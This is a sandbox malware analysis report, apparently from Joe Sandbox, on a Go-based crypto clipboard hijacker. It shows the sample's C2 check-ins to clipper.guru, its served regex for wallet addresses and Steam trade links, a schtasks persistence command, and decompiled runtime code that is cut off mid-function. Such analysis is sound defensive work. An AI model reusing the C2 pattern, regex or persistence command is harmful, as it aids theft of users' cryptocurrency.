64 65 6f 66 66 65 72 5c 2f 6e 65 77 5c 2f 5c 3f 70 61 72 74 6e 65 72 3d 28 5b 30 2d 39 5d 2b 29 26 74 6f 6b 65 6e 3d 28 5b 61 2d 7a 41 2d 5a 30 2d 39 5d 2b 29 29 7c 28 74 7a 5b 31 2d 33 5d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 33 7d 29 7c 28 61 64 64 72 31 5b 61 2d 7a 30 2d 39 5d 2b 29 7c 28 63 6f 73 6d 6f 73 31 5b 61 2d 7a 30 2d 39 5d 7b 33 38 7d 29 7c 28 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 32 2c 34 34 7d 29 7c 28 5b 41 2d 5a 32 2d 37 5d 7b 35 38 7d 29 7c 28 52 5b 61 2d 7a 41 2d 5a 30 2d 39 5d 7b 33 33 7d 29 29 24 Data Ascii: ^(?:(1[a-zA-HJ-NP-Z1-9]{25,59})\|(3[a-zA-HJ-NP-Z0-9]{25,59})\|(bc1q[a-zA-HJ-NP-Z0-9]{24,59})\|(1[a-km-zA-HJ-NP-Z1-9]{25,34})\|(3[a-km-zA-HJ-NP-Z1-9]{25,34})\|(q[a-z0-9]{41})\|(p[a-z0-9]{41})\|(L[a-km-zA-HJ-NP-Z1-9]{26,33})\|(M[a-km-zA-HJ-NP-Z1-9]{26,33})\|(3[a-km-zA-HJ-NP-Z1-9]{26,33})\|(ltc1q[a-km-zA-HJ-NP-Z1-9]{26,33})\|(0x[a-fA-F0-9]{40})\|(D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32})\|(4[0-9AB][1-9A-HJ-NP-Za-km-z]{93})\|(8[0-9AB][1-9A-HJ-NP-Za-km-z]{93})\|(r[0-9a-zA-Z]{24,34})\|(t1[a-km-zA-HJ-NP-Z1-9]{33})\|(X[1-9A-HJ-NP-Za-km-z]{33})\|(ronin:[a-fA-F0-9]{40})\|(T[A-Za-z1-9]{33})\|(http[s]*:\/\/steamcommunity.com\/tradeoffer\/new\/\?partner=([0-9]+)&token=([a-zA-Z0-9]+))\|(tz[1-3][1-9A-HJ-NP-Za-km-z]{33})\|(addr1[a-z0-9]+)\|(cosmos1[a-z0-9]{38})\|([1-9A-HJ-NP-Za-km-z]{32,44})\|([A-Z2-7]{58})\|(R[a-zA-Z0-9]{33}))$

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49709	45.159.189.115	80	C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe

Timestamp	kBytes transferred	Direction	Data
Nov 2, 2022 18:30:51.016272068 CET	101	OUT	GET /bot/online?guid=computer\user&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1 Host: clipper.guru User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
Nov 2, 2022 18:30:51.046528101 CET	101	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 02 Nov 2022 17:30:51 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: keep-alive Data Raw: 6f 6b Data Ascii: ok
Nov 2, 2022 18:30:51.046916962 CET	101	OUT	GET /bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1 Host: clipper.guru User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
Nov 2, 2022 18:30:51.077117920 CET	102	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 02 Nov 2022 17:30:51 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 803 Connection: keep-alive Data Raw: 5e 28 3f 3a 28 31 5b 61 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 35 2c 35 39 7d 29 7c 28 33 5b 61 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 30 2d 39 5d 7b 32 35 2c 35 39 7d 29 7c 28 62 63 31 71 5b 61 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 30 2d 39 5d 7b 32 34 2c 35 39 7d 29 7c 28 31 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 35 2c 33 34 7d 29 7c 28 33 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 35 2c 33 34 7d 29 7c 28 71 5b 61 2d 7a 30 2d 39 5d 7b 34 31 7d 29 7c 28 70 5b 61 2d 7a 30 2d 39 5d 7b 34 31 7d 29 7c 28 4c 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 4d 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 33 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 6c 74 63 31 71 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 30 78 5b 61 2d 66 41 2d 46 30 2d 39 5d 7b 34 30 7d 29 7c 28 44 7b 31 7d 5b 35 2d 39 41 2d 48 4a 2d 4e 50 2d 55 5d 7b 31 7d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 32 7d 29 7c 28 34 5b 30 2d 39 41 42 5d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 39 33 7d 29 7c 28 38 5b 30 2d 39 41 42 5d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 39 33 7d 29 7c 28 72 5b 30 2d 39 61 2d 7a 41 2d 5a 5d 7b 32 34 2c 33 34 7d 29 7c 28 74 31 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 33 33 7d 29 7c 28 58 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 33 7d 29 7c 28 72 6f 6e 69 6e 3a 5b 61 2d 66 41 2d 46 30 2d 39 5d 7b 34 30 7d 29 7c 28 54 5b 41 2d 5a 61 2d 7a 31 2d 39 5d 7b 33 33 7d 29 7c 28 68 74 74 70 5b 73 5d 2a 3a 5c 2f 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 5c 2f 74 72 61 64 65 6f 66 66 65 72 5c 2f 6e 65 77 5c 2f 5c 3f 70 61 72 74 6e 65 72 3d 28 5b 30 2d 39 5d 2b 29 26 74 6f 6b 65 6e 3d 28 5b 61 2d 7a 41 2d 5a 30 2d 39 5d 2b 29 29 7c 28 74 7a 5b 31 2d 33 5d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 33 7d 29 7c 28 61 64 64 72 31 5b 61 2d 7a 30 2d 39 5d 2b 29 7c 28 63 6f 73 6d 6f 73 31 5b 61 2d 7a 30 2d 39 5d 7b 33 38 7d 29 7c 28 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 32 2c 34 34 7d 29 7c 28 5b 41 2d 5a 32 2d 37 5d 7b 35 38 7d 29 7c 28 52 5b 61 2d 7a 41 2d 5a 30 2d 39 5d 7b 33 33 7d 29 29 24 Data Ascii: ^(?:(1[a-zA-HJ-NP-Z1-9]{25,59})\|(3[a-zA-HJ-NP-Z0-9]{25,59})\|(bc1q[a-zA-HJ-NP-Z0-9]{24,59})\|(1[a-km-zA-HJ-NP-Z1-9]{25,34})\|(3[a-km-zA-HJ-NP-Z1-9]{25,34})\|(q[a-z0-9]{41})\|(p[a-z0-9]{41})\|(L[a-km-zA-HJ-NP-Z1-9]{26,33})\|(M[a-km-zA-HJ-NP-Z1-9]{26,33})\|(3[a-km-zA-HJ-NP-Z1-9]{26,33})\|(ltc1q[a-km-zA-HJ-NP-Z1-9]{26,33})\|(0x[a-fA-F0-9]{40})\|(D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32})\|(4[0-9AB][1-9A-HJ-NP-Za-km-z]{93})\|(8[0-9AB][1-9A-HJ-NP-Za-km-z]{93})\|(r[0-9a-zA-Z]{24,34})\|(t1[a-km-zA-HJ-NP-Z1-9]{33})\|(X[1-9A-HJ-NP-Za-km-z]{33})\|(ronin:[a-fA-F0-9]{40})\|(T[A-Za-z1-9]{33})\|(http[s]*:\/\/steamcommunity.com\/tradeoffer\/new\/\?partner=([0-9]+)&token=([a-zA-Z0-9]+))\|(tz[1-3][1-9A-HJ-NP-Za-km-z]{33})\|(addr1[a-z0-9]+)\|(cosmos1[a-z0-9]{38})\|([1-9A-HJ-NP-Za-km-z]{32,44})\|([A-Z2-7]{58})\|(R[a-zA-Z0-9]{33}))$

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49710	45.159.189.115	80	C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe

Timestamp	kBytes transferred	Direction	Data
Nov 2, 2022 18:31:51.963864088 CET	104	OUT	GET /bot/online?guid=computer\user&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1 Host: clipper.guru User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
Nov 2, 2022 18:31:51.995026112 CET	104	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 02 Nov 2022 17:31:51 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: keep-alive Data Raw: 6f 6b Data Ascii: ok
Nov 2, 2022 18:31:51.995821953 CET	104	OUT	GET /bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1 Host: clipper.guru User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
Nov 2, 2022 18:31:52.027110100 CET	105	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 02 Nov 2022 17:31:52 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 803 Connection: keep-alive Data Raw: 5e 28 3f 3a 28 31 5b 61 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 35 2c 35 39 7d 29 7c 28 33 5b 61 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 30 2d 39 5d 7b 32 35 2c 35 39 7d 29 7c 28 62 63 31 71 5b 61 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 30 2d 39 5d 7b 32 34 2c 35 39 7d 29 7c 28 31 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 35 2c 33 34 7d 29 7c 28 33 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 35 2c 33 34 7d 29 7c 28 71 5b 61 2d 7a 30 2d 39 5d 7b 34 31 7d 29 7c 28 70 5b 61 2d 7a 30 2d 39 5d 7b 34 31 7d 29 7c 28 4c 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 4d 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 33 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 6c 74 63 31 71 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 30 78 5b 61 2d 66 41 2d 46 30 2d 39 5d 7b 34 30 7d 29 7c 28 44 7b 31 7d 5b 35 2d 39 41 2d 48 4a 2d 4e 50 2d 55 5d 7b 31 7d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 32 7d 29 7c 28 34 5b 30 2d 39 41 42 5d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 39 33 7d 29 7c 28 38 5b 30 2d 39 41 42 5d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 39 33 7d 29 7c 28 72 5b 30 2d 39 61 2d 7a 41 2d 5a 5d 7b 32 34 2c 33 34 7d 29 7c 28 74 31 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 33 33 7d 29 7c 28 58 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 33 7d 29 7c 28 72 6f 6e 69 6e 3a 5b 61 2d 66 41 2d 46 30 2d 39 5d 7b 34 30 7d 29 7c 28 54 5b 41 2d 5a 61 2d 7a 31 2d 39 5d 7b 33 33 7d 29 7c 28 68 74 74 70 5b 73 5d 2a 3a 5c 2f 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 5c 2f 74 72 61 64 65 6f 66 66 65 72 5c 2f 6e 65 77 5c 2f 5c 3f 70 61 72 74 6e 65 72 3d 28 5b 30 2d 39 5d 2b 29 26 74 6f 6b 65 6e 3d 28 5b 61 2d 7a 41 2d 5a 30 2d 39 5d 2b 29 29 7c 28 74 7a 5b 31 2d 33 5d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 33 7d 29 7c 28 61 64 64 72 31 5b 61 2d 7a 30 2d 39 5d 2b 29 7c 28 63 6f 73 6d 6f 73 31 5b 61 2d 7a 30 2d 39 5d 7b 33 38 7d 29 7c 28 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 32 2c 34 34 7d 29 7c 28 5b 41 2d 5a 32 2d 37 5d 7b 35 38 7d 29 7c 28 52 5b 61 2d 7a 41 2d 5a 30 2d 39 5d 7b 33 33 7d 29 29 24 Data Ascii: ^(?:(1[a-zA-HJ-NP-Z1-9]{25,59})\|(3[a-zA-HJ-NP-Z0-9]{25,59})\|(bc1q[a-zA-HJ-NP-Z0-9]{24,59})\|(1[a-km-zA-HJ-NP-Z1-9]{25,34})\|(3[a-km-zA-HJ-NP-Z1-9]{25,34})\|(q[a-z0-9]{41})\|(p[a-z0-9]{41})\|(L[a-km-zA-HJ-NP-Z1-9]{26,33})\|(M[a-km-zA-HJ-NP-Z1-9]{26,33})\|(3[a-km-zA-HJ-NP-Z1-9]{26,33})\|(ltc1q[a-km-zA-HJ-NP-Z1-9]{26,33})\|(0x[a-fA-F0-9]{40})\|(D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32})\|(4[0-9AB][1-9A-HJ-NP-Za-km-z]{93})\|(8[0-9AB][1-9A-HJ-NP-Za-km-z]{93})\|(r[0-9a-zA-Z]{24,34})\|(t1[a-km-zA-HJ-NP-Z1-9]{33})\|(X[1-9A-HJ-NP-Za-km-z]{33})\|(ronin:[a-fA-F0-9]{40})\|(T[A-Za-z1-9]{33})\|(http[s]*:\/\/steamcommunity.com\/tradeoffer\/new\/\?partner=([0-9]+)&token=([a-zA-Z0-9]+))\|(tz[1-3][1-9A-HJ-NP-Za-km-z]{33})\|(addr1[a-z0-9]+)\|(cosmos1[a-z0-9]{38})\|([1-9A-HJ-NP-Za-km-z]{32,44})\|([A-Z2-7]{58})\|(R[a-zA-Z0-9]{33}))$

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: IVO2cpEukR.exePID: 4544, Parent PID: 3452

General

Target ID:	0
Start time:	18:29:45
Start date:	02/11/2022
Path:	C:\Users\user\Desktop\IVO2cpEukR.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\IVO2cpEukR.exe
Imagebase:	0x320000
File size:	5021696 bytes
MD5 hash:	6738634D9B3BFCF7EBCA8BE48C091B3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5268, Parent PID: 4544

General

Target ID:	1
Start time:	18:29:46
Start date:	02/11/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe "/C schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
Imagebase:	0x7ff7cb270000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5236, Parent PID: 5268

General

Target ID:	2
Start time:	18:29:46
Start date:	02/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 4256, Parent PID: 5268

General

Target ID:	3
Start time:	18:29:46
Start date:	02/11/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
Imagebase:	0x7ff7a7a50000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svcupdater.exePID: 6084, Parent PID: 1064

General

Target ID:	4
Start time:	18:29:48
Start date:	02/11/2022
Path:	C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe
Imagebase:	0x290000
File size:	5021696 bytes
MD5 hash:	6738634D9B3BFCF7EBCA8BE48C091B3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 15%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: IVO2cpEukR.exePID: 4544, Parent PID: 3452COMMON

Non-executed Functions

Function 00354E80 Relevance: 8.9, Strings: 7, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00354E80(void* __ebx, void* __edx, long long* __rdx, void* __rsi, long long __rbp) {
				char _v8;
				long long _v16;
				long long _v24;
				char _v48;
				intOrPtr _v64;
				char _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				void* _v104;
				long long _v120;
				long long _v144;
				long long _v152;
				long long _v160;
				long long _v168;
				void* _t50;
				void* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				void* _t73;
				long long _t85;
				long long _t90;
				intOrPtr _t94;
				long long _t100;
				long long _t101;
				long long _t105;
				long long _t107;
				long long* _t108;
				void* _t113;
				long long* _t114;

				L0:
				while(1) {
					L0:
					_t111 = __rbp;
					_t108 = __rdx;
					_t70 = __edx;
					_t68 = __ebx;
					if( &_v48 <=  *((intOrPtr*)( *((intOrPtr*)( *[gs:0x28])) + 0x10))) {
						goto L7;
					}
					L1:
					_t114 = _t113 - 0xb0;
					_v8 = __rbp;
					_t111 =  &_v8;
					_v104 = 0;
					 *_t114 = DuplicateHandle;
					_v168 = 0xffffffff;
					_v160 = 0xfffffffe;
					_v152 = 0xffffffff;
					_v144 =  &_v104;
					asm("xorps xmm0, xmm0");
					asm("movups [esp+0x28], xmm0");
					_v120 = 2;
					E00355540( &_v8);
					_t85 =  *((intOrPtr*)( *((intOrPtr*)( *[gs:0x28])) + 0x30));
					_v24 = _t85;
					_t105 = _t85 + 0x308;
					_v16 = _t105;
					 *_t114 = _t105;
					L0032BF00(__edx,  &_v8);
					 *((long long*)(_v24 + 0x310)) = _v104;
					 *_t114 = _v16;
					L0032C160( &_v8);
					asm("xorps xmm0, xmm0");
					asm("movups [esp+0x68], xmm0");
					asm("movups [esp+0x78], xmm0");
					asm("movups [esp+0x88], xmm0");
					 *_t114 = VirtualQuery;
					_v168 =  &_v72;
					_t90 =  &_v72;
					_v160 = _t90;
					_v152 = 0x30;
					_t50 = E003553C0(_t111);
					if(_v144 == 0) {
						L6:
						E0038BFA0();
						_v88 = _t90;
						L0035A200( *_t114, _t111);
						 *_t114 = 0x60c434;
						_v168 = 0x24;
						L0035AC40(_t68, _t69, _t71, _t72, _t73, _t111);
						 *_t114 = _v88;
						L0035A920(_t68, _t69, _t71, _t72, _t73, _t111);
						L0035A2A0(L0035A4E0(_t68, _t69, _t70, _t71, _t72, _t73, _t111), _t68, _t111);
						 *_t114 = 0x60b632;
						_v168 = 0x22;
						L00358A00(_t111);
						goto L7;
					}
					L2:
					_t94 = _v64;
					_t107 = _t94 + 0x4000;
					_v96 = _t107;
					_t108 =  *((intOrPtr*)( *[gs:0x28]));
					_t101 =  *((intOrPtr*)(_t108 + 8));
					_v80 = _t101;
					if(_t107 > _t101 || _t101 - _t107 > 0x4000000) {
						L5:
						L0035A200(_t50, _t111);
						 *_t114 = 0x6057b5;
						_v168 = 0x13;
						L0035AC40(_t68, _t69, _t71, _t72, _t73, _t111);
						 *_t114 = _v96;
						L0035AAC0(_t68, _t69, _t71, _t72, _t73, _t111);
						 *_t114 =  &M00600A18;
						_v168 = 1;
						L0035AC40(_t68, _t69, _t71, _t72, _t73, _t111);
						 *_t114 = _v80;
						L0035AAC0(_t68, _t69, _t71, _t72, _t73, _t111);
						 *_t114 = 0x600a4f;
						_v168 = 2;
						L0035A2A0(L0035AC40(_t68, _t69, _t71, _t72, _t73, _t111), _t68, _t111);
						_t90 = 0x602e44;
						 *_t114 = 0x602e44;
						_v168 = 0xc;
						L00358A00(_t111);
						goto L6;
					}
					L4:
					 *_t108 = _t107;
					_t100 = _t94 + 0x53a0;
					 *((long long*)(_t108 + 0x10)) = _t100;
					 *((long long*)(_t108 + 0x18)) = _t100;
					return E0038A560(_t50);
					L8:
					L7:
					E00388B00(_t108, _t111);
				}
			}

0x00354e80
0x00354e80
0x00354e80
0x00354e80
0x00354e80
0x00354e80
0x00354e80
0x00354e99
0x00000000
0x00000000
0x00354e9f
0x00354e9f
0x00354ea6
0x00354eae
0x00354eb6
0x00354ec6
0x00354eca
0x00354ed3
0x00354edc
0x00354eea
0x00354eef
0x00354ef2
0x00354ef7
0x00354f00
0x00354f15
0x00354f19
0x00354f23
0x00354f2a
0x00354f33
0x00354f37
0x00354f49
0x00354f5a
0x00354f60
0x00354f65
0x00354f68
0x00354f6d
0x00354f72
0x00354f81
0x00354f8a
0x00354f8f
0x00354f94
0x00354f99
0x00354fa2
0x00354fad
0x003550a5
0x003550a5
0x003550ad
0x003550b2
0x003550be
0x003550c2
0x003550cb
0x003550d5
0x003550d9
0x003550e5
0x003550f1
0x003550f5
0x00355100
0x00000000
0x00355100
0x00354fb3
0x00354fb3
0x00354fb8
0x00354fbf
0x00354fcd
0x00354fd4
0x00354fd8
0x00354fe3
0x00355017
0x00355017
0x00355023
0x00355027
0x00355030
0x0035503a
0x00355040
0x0035504c
0x00355050
0x00355059
0x00355063
0x00355067
0x00355073
0x00355077
0x00355085
0x0035508a
0x00355091
0x00355095
0x003550a0
0x00000000
0x003550a0
0x00354ff1
0x00354ff1
0x00354ff4
0x00354ffa
0x00354ffe
0x00355016
0x00000000
0x00355106
0x00355106
0x00355106

Strings

runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunexpected InstFailunexpected g statusunknown Go type: %vunknown certificateunknown cipher typeunknown hash , xrefs: 0035501C
0, xrefs: 00354F99
runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 003550B7
VirtualQuery for stack base failedadding nil Certificate to CertPoolbad scalar length: %d, expected %dchacha20: wrong HChaCha20 key sizecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 003550EA
,-./0456:;<=>?@BCLMNOPSZ["\, xrefs: 00355045
bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status gcBitsArenasgcpacertracegetaddrinfowhost is downhttp2debug=1http2debug=2illegal , xrefs: 0035508A
", xrefs: 003550F5

Memory Dump Source

Source File: 00000000.00000002.255162576.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.255147193.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256036731.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256806186.0000000000794000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256820104.000000000079E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256857053.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256879707.00000000007D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256893579.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256905053.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256919572.0000000000808000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256925716.000000000080C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256939772.000000000080D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256980891.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_IVO2cpEukR.jbxd

Similarity

API ID:
String ID: "$,-./0456:;<=>?@BCLMNOPSZ["\$0$VirtualQuery for stack base failedadding nil Certificate to CertPoolbad scalar length: %d, expected %dchacha20: wrong HChaCha20 key sizecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status gcBitsArenasgcpacertracegetaddrinfowhost is downhttp2debug=1http2debug=2illegal $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunexpected InstFailunexpected g statusunknown Go type: %vunknown certificateunknown cipher typeunknown hash
API String ID: 0-1693190135
Opcode ID: 395242f8cd7ab25dd6171b8659f451491b912944ecc023e61412150f96f98ef0
Instruction ID: 2a1be3304f7a6ea1f03ce1ede136c1db7c5429618d4d7b4e4d68e38ffdae64c2
Opcode Fuzzy Hash: 395242f8cd7ab25dd6171b8659f451491b912944ecc023e61412150f96f98ef0
Instruction Fuzzy Hash: 25515536219F8185DB11AF10F09536EB3A8F789764F508221EADC07BA9EF7CC198CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00365340 Relevance: 5.1, Strings: 4, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00365340(void* __eax, long long __rbp, long long _a8) {
				char _v8;
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				long long _t60;
				long long _t72;
				long long _t75;
				long long _t76;
				void* _t77;
				void* _t80;
				long long* _t81;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;

				L0:
				while(1) {
					L0:
					_t78 = __rbp;
					_t32 = __eax;
					if(_t80 <=  *((intOrPtr*)( *((intOrPtr*)( *[gs:0x28])) + 0x10))) {
						goto L9;
					}
					L1:
					_t81 = _t80 - 0x40;
					_v8 = __rbp;
					_t78 =  &_v8;
					_t60 =  *((intOrPtr*)( *[gs:0x28]));
					_t75 =  *((intOrPtr*)(_t60 + 0x30));
					_t76 =  *((intOrPtr*)(_t75 + 0xa0));
					if(_t76 == 0) {
						L8:
						 *_t81 = 0x606435;
